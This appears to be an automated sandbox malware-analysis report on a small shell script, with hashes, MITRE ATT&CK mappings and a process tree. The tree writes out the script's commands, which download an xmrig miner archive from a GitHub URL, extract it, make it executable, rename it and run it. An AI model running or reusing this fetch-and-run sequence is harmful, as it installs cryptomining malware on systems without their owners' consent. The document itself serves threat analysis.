a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6

Analysis

max time kernel
58s
max time network
61s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
30-10-2024 07:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

runnb.sh
Size

213B
MD5

a1189543e2f98f6696c6d857b899ab0a
SHA1

30b167128357a05cb5ae4d8bd386d63839d99c4d
SHA256

a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
SHA512

472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef

Score

7^/10

defense_evasion discovery privilege_escalation

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmod

pid	Process
769	chmod

Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs

Abuse sudo or cached sudo credentials to execute code.

privilege_escalation defense_evasion

Sudo and Sudo Caching

T1548.003

Processes:

sudo

pid	Process
712	sudo

Reads CPU attributes 1 TTPs 2 IoCs

discovery

System Information Discovery

T1082

Processes:

exim4exim4

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	exim4

Reads runtime system information 14 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

tarsudosendmailaptaptdpkgdpkgdpkgsendmaildpkgmv

description	ioc	Process
File opened for reading	/proc/filesystems	tar
File opened for reading	/proc/filesystems	sudo
File opened for reading	/proc/sys/kernel/ngroups_max	sendmail
File opened for reading	/proc/self/fd	apt
File opened for reading	/proc/self/fd	apt
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/self/stat	sudo
File opened for reading	/proc/self/fd	sudo
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/sys/kernel/ngroups_max	sudo
File opened for reading	/proc/sys/kernel/ngroups_max	sendmail
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	mv

Writes file to tmp directory 8 IoCs

Malware often drops required files in the /tmp directory.

Processes:

aptapt

description	ioc	Process
File opened for modification	/tmp/fileutl.message.ZEJSrk	apt
File opened for modification	/tmp/fileutl.message.ItICwU	apt
File opened for modification	/tmp/fileutl.message.Bv7fqJ	apt
File opened for modification	/tmp/fileutl.message.dIGyOn	apt
File opened for modification	/tmp/fileutl.message.Str2VF	apt
File opened for modification	/tmp/fileutl.message.Z97wkj	apt
File opened for modification	/tmp/fileutl.message.BRP5tq	apt
File opened for modification	/tmp/fileutl.message.GDdyTP	apt

/tmp/runnb.sh
/tmp/runnb.sh
1⤵
PID:707
- /usr/bin/sudo
  sudo apt install wget
  2⤵
  - Abuse Elevation Control Mechanism: Sudo and Sudo Caching
  - Reads runtime system information
  PID:712
- - /usr/sbin/sendmail
    sendmail -t
    3⤵
    - Reads runtime system information
    PID:723
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1t638p-0000Bf-LI
      4⤵
      Reads CPU attributes
      PID:738
- - /usr/sbin/sendmail
    sendmail -t
    3⤵
    - Reads runtime system information
    PID:726
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1t638p-0000Bi-Ns
      4⤵
      Reads CPU attributes
      PID:737
- - /usr/bin/apt
    apt install wget
    3⤵
    - Reads runtime system information
    - Writes file to tmp directory
    PID:730
  - - /usr/bin/dpkg
      /usr/bin/dpkg --print-foreign-architectures
      4⤵
      Reads runtime system information
      PID:735
  - - /usr/bin/dpkg
      /usr/bin/dpkg --print-foreign-architectures
      4⤵
      Reads runtime system information
      PID:745
- /usr/bin/apt
  apt install wget
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:764
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:765
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:766
- /usr/bin/wget
  wget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz
  2⤵
  PID:767
- /bin/tar
  tar xvf xmrigtar.tar.gz
  2⤵
  - Reads runtime system information
  PID:768
- /bin/chmod
  chmod +x xmrig
  2⤵
  - File and Directory Permissions Modification
  PID:769
- /bin/mv
  mv xmrig cool
  2⤵
  - Reads runtime system information
  PID:770
- /tmp/cool
  ./cool
  2⤵
  PID:771

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/var/mail/user

Filesize
830B

MD5
b691d12d4c04ac880aef9d73608b3f78

SHA1
15eda923641ee9228f90eb0fd8a5bee358e539dd

SHA256
5130a495265324fb382b0105452203791f9d01c4ded93f019ccf18d3eec3920c

SHA512
840a7bb51d6881995c89cbac1f8fe95c9e56d19d0e1e2c0b58e72a69bb989ca3c607fe2ea8f1360d32a1b911e59d91e45ec7e92f10e67d1ddc28506e07df3bdc

Download Submit
/var/mail/user

Filesize
1KB

MD5
2bdb7338eee7b18ee9d178ead8390538

SHA1
8e5f163d5700cbc3e62d2254d018ccbcdac28869

SHA256
0778f1946e76b412fa48a286802579f7eeb01e506767cc8afaa2cf1651d45102

SHA512
af5cd5de444215db0651428622744cd0082fc00a3dcb51099e9a977c21c2abbb064bd08952acfb018e5145f4b5a3d2d7a674653a61186cb68e4da484925697da

Download Submit
/var/spool/exim4/input/1t638p-0000Bf-LI-D

Filesize
130B

MD5
67c83d0cda52dae1886528e0289f435a

SHA1
f4b1806b68e4ecf8ad1f0066f2c727e5378557ad

SHA256
fe1d22ff96c3b9e521f71b862dd32675938f01c4f7cfe4542b18fdb012f028a8

SHA512
6481debad29eb1d2590fcfde0096d70851f552547825f97465d867d01c96d77af4a54ec00db6e5563ebdd6308e1f112b61fbf291c21d7a5a1405f5bdffe04dc2

Download Submit
/var/spool/exim4/input/1t638p-0000Bf-LI-J

Filesize
34B

MD5
d7d96d63d643a4ce3e408eba7dfcedc5

SHA1
c53607f95c5c57beafc1d8266646797a035f76ea

SHA256
21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159

SHA512
703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

Download Submit
/var/spool/exim4/input/1t638p-0000Bi-Ns-D

Filesize
147B

MD5
4ebdbb3c263692f44e0798f4ae1aad82

SHA1
ae3b259ed8d9fcb3cffad5269582265e238685ef

SHA256
fefe25e8832e84c6affdffa39bf81c125b3a9ec085c6a48c9a578a274cb82051

SHA512
d52fe14e92768bbee03a97af5b168fbdaf8aa0b30e429094dd05366106af99665691f39d3550e889b6ffcb5e6b6d9f501c2c608b76b0ca34a15b3b8571db0af9

Download Submit
/var/spool/exim4/input/hdr.723

Filesize
918B

MD5
225b0ac7dcccea6451ec52d1ecd85891

SHA1
4109835eb7d374697035f84ce25bfd99ad21e60d

SHA256
c2c782f20502f1fff0474e9e49352669f5385e749b2be0ec4fdf01ddb5314853

SHA512
0c2764da14cbfcba3bb9e6b75daa7d92cd4b192ab9d912abd8b71211a106460eb94ee0fb281e21cd4be7e3bc52e429da4c674ddd315a8063b19e38f50b95910f

Download Submit
/var/spool/exim4/msglog/1t638p-0000Bf-LI

Filesize
288B

MD5
29ac4191c3496345307b4006987178be

SHA1
933e8e60b0b58ec2ea2ee3e2ba1a7a5feb223562

SHA256
00364cf5822a667095b4e5317f7a24ae1febab96ecbdf9fca53ce5e1a72a2ab7

SHA512
443a28c5089a01de124d3bd5a8e1fa4ecb0581c58178cabc485cd967ceb0c901c55bfcad96aa9c16abc9bea447ef8cfeb7a4e8fd233b96b01505dd959a513616

Download Submit
/var/spool/exim4/msglog/1t638p-0000Bf-LI

Filesize
89B

MD5
8bfb892c9a31851b75c1482d86072c65

SHA1
13dfc0e8802545a73a1ba3a44f0868ee0209b92d

SHA256
103b7f073e879edc7e933e89715c5c29a7e04bb41e61e7812ec0b020676b96e5

SHA512
0cec09e458350151df92a37dacd1832419b666c0be77e91d5c7ed07bcd7979600e5579784f588879fa8f186d1792937abb2ea270bba11f629cb386ba634ceb77

Download Submit
/var/spool/exim4/msglog/1t638p-0000Bi-Ns

Filesize
288B

MD5
7dda87af09c6624c33bf2fa3950eede6

SHA1
7c3993c6604c93392e3a9c976d9c7783a117dda5

SHA256
9015876bebc1f6a5c397253f1097f5a47bd4d89c01ef92fd6babe2ab6bab9e5c

SHA512
7c7d55d5f1f0199fa1579aa081ecb1bf8d9d3a54f102c87a85118e0f8d3f8d3f16c3df21ea168ed37b4c8e545cb018501056334698e2df76cce5fbd5fc6bf2dc

Download Submit
/var/spool/exim4/msglog/1t638p-0000Bi-Ns

Filesize
89B

MD5
c503c1adbd93d9c73652f914ada2cb95

SHA1
5b4a322e4714d0071300d06f6f6fdd7359f0c16f

SHA256
1c4dc72a4d6bbdf533f2b313878b769c19da1d52413c42d900cf23ad808b512d

SHA512
d90ae0191b27051cf58607286ddb7358de57b3da0ec57db10bbbab6bc6cda0f3e57b6bf9ef06440208806313ebcd480057f979722ebd0dc8698f33241f2d5487

Download Submit